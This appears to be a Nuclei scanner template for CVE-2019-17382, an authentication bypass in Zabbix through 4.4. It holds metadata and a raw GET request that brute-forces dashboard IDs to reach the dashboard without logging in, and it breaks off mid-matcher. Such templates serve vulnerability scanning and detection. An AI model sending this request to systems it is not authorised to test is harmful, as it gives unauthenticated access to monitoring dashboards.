id: CVE-2019-17382 info: name: Zabbix Authentication Bypass author: harshbothra_ severity: critical description: An issue was discovered in zabbix.php?action=dashboard.view&dashboardid=1 in Zabbix through 4.4. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin. reference: - https://www.exploit-db.com/exploits/47467 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 tags: cve,cve2019,zabbix,fuzz,bypass,login requests: - raw: - | GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1 Host: {{Hostname}} Accept-Language: en-US,en;q=0.9 payloads: ids: helpers/wordlists/numbers.txt threads: 50 stop-at-first-match: true matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "